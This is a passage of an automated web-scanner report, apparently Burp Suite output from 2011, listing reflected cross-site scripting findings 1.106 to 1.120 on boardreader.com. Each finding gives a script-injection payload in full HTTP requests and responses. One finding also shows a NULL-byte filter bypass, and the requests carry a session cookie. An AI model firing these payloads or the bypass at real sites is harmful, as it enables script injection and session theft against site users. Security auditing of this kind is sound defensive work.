GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext%00b85f1"><script>alert(1)</script>8330a287d66 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:30:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
"./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext%00b85f1"><script>alert(1)</script>8330a287d66">
...[SNIP]...

1.106. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87160"><script>alert(1)</script>04f67b98015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext&87160"><script>alert(1)</script>04f67b98015=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:31:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
f="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext&87160"><script>alert(1)</script>04f67b98015=1">
...[SNIP]...

1.107. http://boardreader.com/index.php [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bb6"><script>alert(1)</script>60f59291b18 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gife6bb6"><script>alert(1)</script>60f59291b18&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:21:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/s0.2mdn.net/viewad/817-grey.gife6bb6"><script>alert(1)</script>60f59291b18?p=10&format=RSS2.0" />
...[SNIP]...

1.108. http://boardreader.com/index.php [q2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /index.php

Issue detail

The value of the q2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002cc1b"><script>alert(1)</script>44dd33ad4cf was submitted in the q2 parameter. This input was echoed as 2cc1b"><script>alert(1)</script>44dd33ad4cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>s0.2md
...[SNIP]...
<A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1&ltype=ext">
...[SNIP]...

1.109. http://boardreader.com/linkinfo/2mdn.net [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /linkinfo/2mdn.net

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d233"><script>alert(1)</script>fb62f634db2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linkinfo/2mdn.net9d233"><script>alert(1)</script>fb62f634db2 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:30:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close


           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <title>2mdn.n
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/2mdn.net9d233"><script>alert(1)</script>fb62f634db2?p=10&format=RSS2.0" />
...[SNIP]...

1.110. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /my/signup.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee33"><script>alert(1)</script>4385cd9a478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:04:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<form name="mylogin_" action="/my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1" method="POST">
...[SNIP]...

1.111. http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /s/2mdn.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fe6"><script>alert(1)</script>3c9811f6ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:27:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

           
                                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1&p=20&format=RSS2.0" />
...[SNIP]...

1.112. http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/Monterey_military_Group_CafeMo_764716.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992f8"><script>alert(1)</script>4308af3ecf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1" title="Monterey military Group - CafeMom | Site Profile">
...[SNIP]...

1.113. http://boardreader.com/site/Nolan_Fans_Forums_8842059.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/Nolan_Fans_Forums_8842059.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42801"><script>alert(1)</script>8c06b2169ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1" title="Nolan Fans | Forums | Site Profile">
...[SNIP]...

1.114. http://boardreader.com/site/RateDesi_Forums_13026.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/RateDesi_Forums_13026.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59e88"><script>alert(1)</script>ff22a856e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1" title="RateDesi Forums | Site Profile">
...[SNIP]...

1.115. http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/Research_Learn_Message_Boards_1404604.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7999"><script>alert(1)</script>ffa4f5f1626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:54 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:13:55 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1" title="Research & Learn Message Boards - AOL Message Boards | Site Profile">
...[SNIP]...

1.116. http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/Sherdog_Mixed_Martial_Arts_For_14952.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced5c"><script>alert(1)</script>6a0288545dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:20:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1" title="Sherdog Mixed Martial Arts Forums | Site Profile">
...[SNIP]...

1.117. http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/The_CafeMom_Newcomers_Club_Gro_655408.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6f5"><script>alert(1)</script>40022661852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1" title="The CafeMom Newcomers Club Group - CafeMom | Site Profile">
...[SNIP]...

1.118. http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/The_Mastiff_Sweet_Spot_6024491.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e18"><script>alert(1)</script>6e380957a50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1" title="The Mastiff Sweet Spot | Site Profile">
...[SNIP]...

1.119. http://boardreader.com/site/UFC_Community_Forum_9057873.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/UFC_Community_Forum_9057873.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb29"><script>alert(1)</script>110fab5c39e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href="http://boardreader.com/site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1" title="UFC Community Forum | Site Profile">
...[SNIP]...

1.120. http://boardreader.com/site/Ultimate_College_Softball_5898982.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /site/Ultimate_College_Softball_5898982.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b11b"><script>alert(1)</script>5da4301906 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

